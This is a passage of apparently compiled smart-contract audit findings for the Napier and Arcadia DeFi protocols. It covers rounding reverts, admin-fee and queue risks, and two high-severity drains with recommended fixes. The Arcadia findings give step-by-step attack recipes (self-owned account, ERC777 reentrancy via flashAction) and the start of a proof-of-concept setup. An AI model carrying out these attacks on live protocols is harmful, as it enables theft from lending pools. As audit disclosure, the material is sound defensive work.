cscale * ytOutDesired / maxscale;\\nuDepositNoFee = 1.2e18 * 123 / 1.25e18 = 118.08 = 118 (Round down)\\n\\nuDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1))\\nuDeposit = 118 * 10000 / (10000 - (0 + 1)) = 118.0118012 = 118 (Round down)\\n```\\n\\nSubsequently, the code will perform a flash-swap via the `swapPtForUnderlying` function. It will borrow 123 PT from the pool, which must be repaid later.\\nIn the swap callback function, the code will transfer 118 underlying assets to the Tranche and execute the `Tranche.issue` function to mint/issue PY + YT.\\nWithin the `Tranche.issue` function, it will trigger the `adapter.prefundedDeposit()` function to mint the estETH/shares. 
The following is the number of estETH/shares minted:\\n```\\nshares = assets * (total supply/total assets)\\nshares = 118 * 100e18 / 120e18 = 98.33333333 = 98 shares\\n```\\n\\nNext, Line 219 of the `Tranche.issue` function below will compute the number of PY + YT to be issued/minted:\\n```\\nissued = (sharesUsed - fee).mulWadDown(_maxscale);\\nissued = (sharesUsed - 0).mulWadDown(_maxscale);\\nissued = sharesUsed.mulWadDown(_maxscale);\\n\\nissued = sharesUsed * _maxscale / WAD\\nissued = 98 * 1.25e18 / 1e18 = 122.5 = 122 PT (Round down)\\n```\\n\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n```\\n\\nAt the end of the `Tranche.issue` function, 122 PY + YT are issued/minted back to the Router.\\nNote that 123 PT was flash-loaned earlier, and 123 PT needs to be repaid. Otherwise, the code at Line 164 below will revert. The main problem is that only 122 PY was issued/minted (a shortfall of 1 PY). Thus, the swap TX will revert at the end.\\n```\\nFile: NapierRouter.sol\\n function swapCallback(int256 underlyingDelta, int256 ptDelta, bytes calldata data) external override {\\n..SNIP..\\n uint256 pyIssued = params.pt.issue({to: address(this), underlyingAmount: params.underlyingDeposit});\\n\\n // Repay the PT to Napier pool\\n if (pyIssued < pyDesired) revert Errors.RouterInsufficientPtRepay();\\n```\\n
The buffer does not appear to be the correct approach to manage this rounding error. One could increase the buffer from 0.01% to 1% and solve the issue in the above example, but a different or larger number might cause a rounding error to surface again. Also, a larger buffer means that many unnecessary PTs will be issued.\\nThus, it is recommended that a round-up division be performed when computing the `uDepositNoFee` and `uDeposit` using functions such as `divWadUp` so that the issued/minted PT can cover the debt.
The core function (swapUnderlyingForYt) of the Router will break. Users who intend to swap underlying assets to YT tokens via the Router will not be able to do so.
```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n
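A sketch of the recommended round-up computation, reusing the solmate-style `mulDivUp` helper that the codebase already appears to use (`mulDivUp`/`mulWadDown` appear in the quoted snippets); the import path and the exact call site are assumptions:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Path assumed; adjust to the project's solmate remapping.
import {FixedPointMathLib} from "solmate/src/utils/FixedPointMathLib.sol";

library UDepositMathSketch {
    using FixedPointMathLib for uint256;

    uint256 internal constant MAX_BPS = 10_000;

    /// @dev Round *up* at each step so the PT/YT issued always covers the flash-borrowed PT.
    /// The original +1 bps buffer could still be kept on top as extra margin if desired.
    function computeUDeposit(
        uint256 cscale,
        uint256 maxscale,
        uint256 ytOutDesired,
        uint256 issuanceFeeBps
    ) internal pure returns (uint256 uDeposit) {
        uint256 uDepositNoFee = ytOutDesired.mulDivUp(cscale, maxscale);
        uDeposit = uDepositNoFee.mulDivUp(MAX_BPS, MAX_BPS - issuanceFeeBps);
    }
}
```

Re-running the example above (cscale = 1.2e18, maxscale = 1.25e18, ytOutDesired = 123, zero fee) with round-up division yields uDeposit = 119, which under the same adapter state (100e18 shares / 120e18 assets) mints 123 PT and fully repays the flash-swapped amount; whether rounding up alone covers every adapter-rounding path should still be verified with fuzz tests.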
FRAX admin can adjust fee rate to harm Napier and its users
medium
The FRAX admin can adjust fee rates to harm Napier and its users, preventing Napier users from withdrawing.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered "RESTRICTED". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nThe following is one of the ways the FRAX admin can harm Napier and its users.\\nThe FRAX admin can set the redemption fee to 100%.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n\\nWhen the adaptor attempts to redeem the staked ETH from FRAX via the `enterRedemptionQueue` function, the 100% fee will consume the entire redemption amount, leaving nothing for Napier's adaptor.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function enterRedemptionQueue(address _recipient, uint120 _amountToRedeem) public nonReentrant {\\n // Get queue information\\n RedemptionQueueState memory _redemptionQueueState = redemptionQueueState;\\n RedemptionQueueAccounting memory _redemptionQueueAccounting = redemptionQueueAccounting;\\n\\n // Calculations: redemption fee\\n uint120 _redemptionFeeAmount = ((uint256(_amountToRedeem) * _redemptionQueueState.redemptionFee) /\\n FEE_PRECISION).toUint120();\\n\\n // Calculations: amount of ETH owed to the user\\n uint120 _amountEtherOwedToUser = _amountToRedeem - _redemptionFeeAmount;\\n\\n // Calculations: increment ether liabilities by the amount of ether owed to the user\\n _redemptionQueueAccounting.etherLiabilities += uint128(_amountEtherOwedToUser);\\n\\n // Calculations: increment unclaimed fees by the redemption fee taken\\n _redemptionQueueAccounting.unclaimedFees += _redemptionFeeAmount;\\n\\n // Calculations: maturity timestamp\\n uint64 _maturityTimestamp = uint64(block.timestamp) + _redemptionQueueState.queueLengthSecs;\\n\\n // Effects: Initialize the redemption ticket NFT information\\n nftInformation[_redemptionQueueState.nextNftId] = RedemptionQueueItem({\\n amount: _amountEtherOwedToUser,\\n maturity: _maturityTimestamp,\\n hasBeenRedeemed: false,\\n earlyExitFee: _redemptionQueueState.earlyExitFee\\n });\\n```\\n
Ensure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.
Users are unable to withdraw their assets. Loss of assets for the victims.
```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n
SFrxETHAdapter redemptionQueue waiting period can DOS adapter functions
medium
The waiting period between the `rebalancer` address making a withdrawal request and the withdrawn funds being ready to claim from `FraxEtherRedemptionQueue` is extremely long, which can lead to a significant period of time where some of the protocol's functions are either unusable or work in a diminished capacity.\\nIn FraxEtherRedemptionQueue.sol, the queue wait time is stored in the state struct `redemptionQueueState` as `redemptionQueueState.queueLengthSecs` and is currently set to `1_296_000 Seconds` or 15 days; as recently as January, however, it was at `1_555_200 Seconds` or `18 Days`. View the current setting by calling `redemptionQueueState()` here.\\n`BaseLSTAdapter::requestWithdrawal()` is an essential function which helps to maintain `bufferEth` at a defined, healthy level. `bufferEth` is a facility which enables the smooth running of redemptions and deposits.\\nFor redemptions, it allows users to redeem `underlying` without having to wait for any period of time. However, redemption amounts requested which are greater than `bufferEth` will be rejected, as can be seen below in `BaseLSTAdapter::prefundedRedeem()`. Further, there is nothing preventing `redemptions` from bringing `bufferEth` all the way to `0`.\\n```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n\\nFor deposits, where `bufferEth` is too low, it keeps user `deposits` in the contract until a deposit is made which brings `bufferEth` above its target, at which point it stakes. During this time, the `deposits`, which are kept in the adapter, do not earn any yield, making those funds unprofitable.\\n```\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n // SOME CODE\\n> if (targetBufferEth >= availableEth + queueEthCache) {\\n> bufferEth = availableEth.toUint128();\\n return (assets, shares);\\n }\\n // SOME CODE\\n }\\n```\\n
Consider adding a function allowing the rebalancer to call `earlyBurnRedemptionTicketNft()` in `FraxEtherRedemptionQueue.sol` when necessary. This will allow an immediate withdrawal for a fee of 0.5%; see the function here
If the `SFrxETHAdapter` experiences a large net redemption, bringing `bufferEth` significantly below `targetBufferEth`, the rebalancer can be required to make a withdrawal request in order to replenish the buffer. However, this will be an ineffective action given the current 15-day waiting period. During the waiting period, if `redemptions > deposits`, `bufferEth` can be brought down to `0`, which will mean a complete DOSing of the `prefundedRedeem()` function.\\nDuring the wait period too, if `redemptions >= deposits`, no new funds will be staked in `FRAX` so yields for users will decrease and may in turn lead to more redemptions.\\nThese conditions could also necessitate the immediate calling again of `requestWithdrawal()`, given that withdrawal requests can only bring `bufferEth` up to its target level and not beyond, and during the wait period there could be further redemptions.
```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n
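A sketch of the suggested escape hatch on the adapter side. The `earlyBurnRedemptionTicketNft` interface below is an assumption and must be verified against the deployed `FraxEtherRedemptionQueue`; the adapter bookkeeping loosely mirrors the `claimWithdrawal()` snippet quoted earlier, and the ~0.5% early-exit fee means less ETH is received than was queued, which the adapter's accounting has to absorb.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// @dev Assumed interface; verify the exact signature against the deployed FraxEtherRedemptionQueue.
interface IFraxRedemptionQueueEarlyExit {
    function earlyBurnRedemptionTicketNft(address payable recipient, uint256 nftId)
        external
        returns (uint120 collectedAmount);
}

/// @dev Sketch: lets the rebalancer accept the early-exit fee when the buffer is critically low.
abstract contract EarlyClaimSketch {
    IFraxRedemptionQueueEarlyExit public immutable REDEMPTION_QUEUE;
    uint256 public requestId;
    uint128 public withdrawalQueueEth;
    uint128 public bufferEth;

    error NoPendingWithdrawal();

    constructor(address redemptionQueue) {
        REDEMPTION_QUEUE = IFraxRedemptionQueueEarlyExit(redemptionQueue);
    }

    function claimWithdrawalEarly() external /* onlyRebalancer */ {
        uint256 _requestId = requestId;
        if (_requestId == 0) revert NoPendingWithdrawal();
        delete requestId;
        delete withdrawalQueueEth;

        // The early-exit fee means `received` is less than the queued amount;
        // the adapter's totalAssets accounting must absorb that difference.
        uint120 received = REDEMPTION_QUEUE.earlyBurnRedemptionTicketNft(payable(address(this)), _requestId);
        bufferEth += uint128(received);
        // In the real adapter the received ETH would be wrapped back to WETH here.
    }

    receive() external payable {}
}
```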
`AccountV1#flashActionByCreditor` can be used to drain assets from account without withdrawing
high
`AccountV1#flashActionByCreditor` is designed to allow atomic flash actions moving funds from the `owner` of the account. By making the account own itself, these arbitrary calls can be used to transfer `ERC721` assets directly out of the account. The assets being transferred from the account will still show as deposited on the account, allowing it to take out loans from creditors without having any actual assets.\\nThe overview of the exploit is as follows:\\n```\\n1) Deposit ERC721\\n2) Set creditor to maliciously designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks it has ERC721\\n5) Use maliciously designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n6) Update creditor to legitimate creditor\\n7) Take out loan against nothing\\n8) Profit\\n```\\n\\nThe key to this exploit is that the account is able to be its own `owner`. Paired with a maliciously designed `creditor` (the creditor can be set to anything), `flashActionByCreditor` can be called by the attacker when this is the case.\\nAccountV1.sol#L770-L772\\n```\\nif (transferFromOwnerData.assets.length > 0) {\\n _transferFromOwner(transferFromOwnerData, actionTarget);\\n}\\n```\\n\\nIn these lines the `ERC721` token is transferred out of the account. The issue is that even though the token is transferred out, the `erc721Stored` array is not updated to reflect this change.\\nAccountV1.sol#L570-L572\\n```\\nfunction auctionBoughtIn(address recipient) external onlyLiquidator nonReentrant {\\n _transferOwnership(recipient);\\n}\\n```\\n\\nAs seen above, `auctionBoughtIn` does not have any requirement besides being called by the `liquidator`. Since the `liquidator` is also malicious, it can abuse this function to set the `owner` to any address, which allows the attacker to recover ownership of the account. Now the attacker has an account that still considers the `ERC721` token as owned but that token isn't actually present in the account.\\nNow the account creditor can be set to a legitimate pool and a loan taken out against no collateral at all.
The root cause of this issue is that the account can own itself. The fix is simple: make the account unable to own itself by causing `transferOwnership` to revert if the new owner is `address(this)`.
Account can take out completely uncollateralized loans, causing massive losses to all lending pools.
```\\n1) Deposit ERC721\\n2) Set creditor to maliciously designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks it has ERC721\\n5) Use maliciously designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n6) Update creditor to legitimate creditor\\n7) Take out loan against nothing\\n8) Profit\\n```\\n
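A minimal sketch of the fix described above, with the ownership-transfer hook name taken from the report's snippets (the real Arcadia account has more transfer paths that would all need the same check):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

/// @dev Sketch: an Account must never become its own owner.
abstract contract NoSelfOwnershipSketch {
    address public owner;

    error InvalidRecipient();

    function _transferOwnership(address newOwner) internal virtual {
        if (newOwner == address(this)) revert InvalidRecipient();
        owner = newOwner;
    }
}
```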
Reentrancy in flashAction() allows draining liquidity pools
high
It is possible to drain a liquidity pool/creditor if the pool's asset is an ERC777 token by triggering a reentrancy flow using flash actions.\\nThe following vulnerability describes a complex flow that allows draining any liquidity pool where the underlying asset is an ERC777 token. Before diving into the vulnerability, it is important to properly understand and highlight some concepts from Arcadia that are relevant in order to allow this vulnerability to take place:\\nFlash actions: flash actions in Arcadia operate in a similar fashion to flash loans. Any account owner will be able to borrow an arbitrary amount from the creditor without putting any collateral as long as the account remains in a healthy state at the end of execution. The following steps summarize what actually happens when `LendingPool.flashAction()` flow is triggered:\\nThe amount borrowed (plus fees) will be minted to the account as debt tokens. This means that the amount borrowed in the flash action will be accounted as debt during the whole `flashAction()` execution. If a flash action borrowing 30 tokens is triggered for an account that already has 10 tokens in debt, the debt balance of the account will increase to 40 tokens + fees.\\nBorrowed asset will be transferred to the `actionTarget`. The `actionTarget` is an arbitrary address passed as parameter in the `flashAction()`. It is important to be aware of the fact that transferring the borrowed funds is performed prior to calling `flashActionByCreditor()`, which is the function that will end up verifying the account's health state. This is the step where the reentrancy will be triggered by the `actionTarget`.\\nThe account's `flashActionByCreditor()` function is called. This is the last step in the execution function, where a health check for the account is performed (among other things).\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address `actionTarget`, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n ... \\n\\n uint256 amountBorrowedWithFee = amountBorrowed + amountBorrowed.mulDivUp(originationFee, ONE_4);\\n\\n ...\\n \\n // Mint debt tokens to the Account, debt must be minted before the actions in the Account are performed.\\n _deposit(amountBorrowedWithFee, account);\\n\\n ...\\n\\n // Send Borrowed funds to the `actionTarget`.\\n asset.safeTransfer(actionTarget, amountBorrowed);\\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint...).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n ... \\n }\\nCollateral value: Each creditor is configured with some risk parameters in the `Registry` contract. 
One of the risk parameters is the `minUsdValue`, which is the minimum USD value any asset must have when it is deposited into an account for the creditor to consider such collateral as valid. If the asset does not reach the `minUsdValue`, it will simply be accounted with a value of 0. For example: if the `minUsdValue` configured for a given creditor is 100 USD and we deposit an asset in our account worth 99 USD (let's say 99 USDT), the USDT collateral will be accounted as 0. This means that our USDT will be worth nothing in the eyes of the creditor. However, if we deposit one more USDT token into the account, our USD collateral value will increase to 100 USD, reaching the `minUsdValue`. Now, the creditor will consider our account's collateral to be worth 100 USD instead of 0 USD.\\nLiquidations: Arcadia liquidates unhealthy accounts using a dutch-auction model. When a liquidation is triggered via `Liquidator.liquidateAccount()`, all the information regarding the debt and assets from the account will be stored in `auctionInformation_`, which maps account addresses to an `AuctionInformation` struct. An important field in this struct is the `assetShares`, which will store the relative value of each asset, with respect to the total value of the Account.\\nWhen a user wants to bid for an account in liquidation, the `Liquidator.bid()` function must be called. An important feature of this function is that it does not require the bidder to repay the loan in full (thus getting the full collateral in the account). Instead, the bidder can specify which collateral asset and amount they want to obtain back, and the contract will compute the amount of debt required to be repaid by the bidder for that amount of collateral. If the user wants to repay the full loan, all the collateral in the account will be specified by the bidder.\\nWith this background, we can now move on to describing the vulnerability in full.\\nInitially, we will create an account and deposit collateral whose value is at the limit of the configured `minUsdValue` (if the `minUsdValue` is 100 tokens, the ideal amount to have will be 100 tokens to maximize gains). We will see why this is required later. The account's collateral and debt status will look like this:\\n\\nThe next step after creating the account is to trigger a flash action. As mentioned in the introduction, the borrowed funds will be sent to the `actionTarget` (this will be a contract we create and control). An important requirement is that if the borrowed asset is an ERC777 token, we will be able to execute the ERC777 callback in our `actionTarget` contract, enabling us to gain control of the execution flow. Following our example, if we borrowed 200 tokens, the account's status would look like this:\\n\\nOn receiving the borrowed tokens, the actual attack will begin. The `actionTarget` will trigger the `Liquidator.liquidateAccount()` function to liquidate our own account. This is possible because the funds borrowed using the flash action are accounted as debt for our account (as we can see in the previous image, the borrowed amount greatly surpasses our account's collateral value) prior to executing the `actionTarget` ERC777 callback, making the account susceptible to being liquidated. 
Executing this function will start the auction process and store data relevant to the account and its debt in the `auctionInformation_` mapping.\\nAfter finishing the `liquidateAccount()` execution, the next step for the `actionTarget` is to place a bid in our own account's auction by calling `Liquidator.bid()`. The trick here is to request a small amount from the account's collateral in the `askedAssetAmounts` array (if we had 100 tokens as collateral in the account, we could ask for only 1). The small requested amount will make the `price` to pay for the bid, computed by `_calculateBidPrice()`, really small so that we can maximize our gains. Another requirement will be to set the `endAuction_` parameter to `true` (we will see why later):\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of "price" in "Numeraire" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a "transferFrom" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n\\nAfter computing the small price to pay for the bid, the `LendingPool.auctionRepay()` function will be called. Because we are repaying a really small amount from the debt, the `accountDebt <= amount` condition will NOT hold, so the only actions performed by `LendingPool.auctionRepay()` will be transferring the small amount of tokens to pay the bid, and calling `_withdraw()` to burn the corresponding debt from the account (a small amount of debt will be burnt here because the bid amount is small). 
It is also important to note that the `earlyTerminate` flag will remain false:\\n```\\n// LendingPool.sol\\n\\nfunction auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)\\n external\\n whenLiquidationNotPaused\\n onlyLiquidator \\n processInterests\\n returns (bool earlyTerminate)\\n {\\n // Need to transfer before burning debt or ERC777s could reenter.\\n // Address(this) is trusted -> no risk on re-entrancy attack after transfer.\\n asset.safeTransferFrom(bidder, address(this), amount);\\n\\n uint256 accountDebt = maxWithdraw(account); \\n if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();\\n if (accountDebt <= amount) {\\n // The amount recovered by selling assets during the auction is bigger than the total debt of the Account.\\n // -> Terminate the auction and make the surplus available to the Account-Owner.\\n earlyTerminate = true;\\n unchecked {\\n _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));\\n }\\n amount = accountDebt;\\n }\\n \\n _withdraw(amount, address(this), account); \\n\\n emit Repay(account, bidder, amount);\\n }\\n```\\n\\nAfter `LendingPool.auctionRepay()`, execution will go back to `Liquidator.bid()`. The account's `auctionBid()` function will then be called, which will transfer the 1 token requested by the bidder in the `askedAssetAmounts` parameter from the account's collateral to the bidder. This is the most important concept in the attack. Because 1 token is moving out from the account's collateral, the account's current collateral value will decrease from 100 USD to 99 USD, falling under the minimum `minUsdValue` amount of 100 USD and thus making the account's collateral value go straight to 0 in the eyes of the creditor:\\n\\nBecause `earlyTerminate` was NOT set to `true` in `LendingPool.auctionRepay()`, the `if (earlyTerminate)` condition will be skipped, going straight to evaluating the `else if (endAuction_)` condition. Because we set the `endAuction_` parameter to `true` when calling the `bid()` function, `_settleAuction()` will execute.\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n // rest of code\\n \\n // Transfer the assets to the bidder.\\n IAccount(account).auctionBid(\\n auctionInformation_.assetAddresses, auctionInformation_.assetIds, askedAssetAmounts, msg.sender\\n );\\n // If all the debt is repaid, the auction must be ended, even if the bidder did not set endAuction to true.\\n if (earlyTerminate) {\\n // Stop the auction, no need to do a health check for the account since it has no debt anymore.\\n _endAuction(account);\\n }\\n // If not all debt is repaid, the bidder can still earn a termination incentive by ending the auction\\n // if one of the conditions to end the auction is met.\\n // "_endAuction()" will silently fail without reverting, if the auction was not successfully ended.\\n else if (endAuction_) {\\n if (_settleAuction(account, auctionInformation_)) _endAuction(account);\\n } \\n }\\n```\\n\\n`_settleAuction()` is where the final steps of the attack will take place. 
Because we made the collateral value of our account purposely decrease from the `minUsdValue`, `_settleAuction` will interpret that all collateral has been sold, and the `else if (collateralValue == 0)` will evaluate to true, making the creditor's `settleLiquidationUnhappyFlow()` function be called:\\n```\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // Cache variables.\\n uint256 startDebt = auctionInformation_.startDebt;\\n address creditor = auctionInformation_.creditor;\\n uint96 minimumMargin = auctionInformation_.minimumMargin;\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue();\\n uint256 usedMargin = IAccount(account).getUsedMargin();\\n \\n // Check the different conditions to end the auction.\\n if (collateralValue >= usedMargin || usedMargin == minimumMargin) { \\n // Happy flow: Account is back in a healthy state.\\n // An Account is healthy if the collateral value is equal or greater than the used margin.\\n // If usedMargin is equal to minimumMargin, the open liabilities are 0 and the Account is always healthy.\\n ILendingPool(creditor).settleLiquidationHappyFlow(account, startDebt, minimumMargin, msg.sender);\\n } else if (collateralValue == 0) {\\n // Unhappy flow: All collateral is sold.\\n ILendingPool(creditor).settleLiquidationUnhappyFlow(account, startDebt, minimumMargin, msg.sender);\\n }\\n // rest of code\\n \\n \\n return true;\\n }\\n```\\n\\nExecuting the `settleLiquidationUnhappyFlow()` will burn ALL the remaining debt (balanceOf[account] will return all the remaining balance of debt tokens for the account), and the liquidation will be finished, calling `_endLiquidation()` and leaving the account with 99 tokens of collateral and a 0 amount of debt (and the `actionTarget` with ALL the borrowed funds taken from the flash action).\\n```\\n// LendingPool.sol\\n\\nfunction settleLiquidationUnhappyFlow(\\n address account,\\n uint256 startDebt,\\n uint256 minimumMargin_,\\n address terminator\\n ) external whenLiquidationNotPaused onlyLiquidator processInterests {\\n // rest of code\\n\\n // Any remaining debt that was not recovered during the auction must be written off.\\n // Depending on the size of the remaining debt, different stakeholders will be impacted.\\n uint256 debtShares = balanceOf[account];\\n uint256 openDebt = convertToAssets(debtShares);\\n uint256 badDebt;\\n // rest of code\\n\\n // Remove the remaining debt from the Account now that it is written off from the liquidation incentives/Liquidity Providers.\\n _burn(account, debtShares);\\n realisedDebt -= openDebt;\\n emit Withdraw(msg.sender, account, account, openDebt, debtShares);\\n\\n _endLiquidation();\\n\\n emit AuctionFinished(\\n account, address(this), startDebt, initiationReward, terminationReward, liquidationPenalty, badDebt, 0\\n );\\n }\\n```\\n\\nAfter the actionTarget's ERC777 callback execution, the execution flow will return to the initially called `flashAction()` function, and the final `IAccount(account).flashActionByCreditor()` function will be called, which will pass all the health checks due to the fact that all the debt from the account was burnt:\\n```\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address actionTarget, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n \\n // rest of code \\n \\n // The Action Target will use the borrowed funds (optionally with 
additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint// rest of code).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n // rest of code \\n }\\n```\\n\\n```\\n// AccountV1.sol\\n\\nfunction flashActionByCreditor(address actionTarget, bytes calldata actionData)\\n external\\n nonReentrant\\n notDuringAuction\\n updateActionTimestamp\\n returns (uint256 accountVersion)\\n {\\n \\n // rest of code\\n\\n // Account must be healthy after actions are executed.\\n if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();\\n\\n // rest of code\\n }\\n```\\n\\nProof of Concept\\nThe following proof of concept illustrates how the previously described attack can take place. Follow the steps in order to reproduce it:\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import "../utils/mocks/tokens/ERC777Mock.sol"; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add 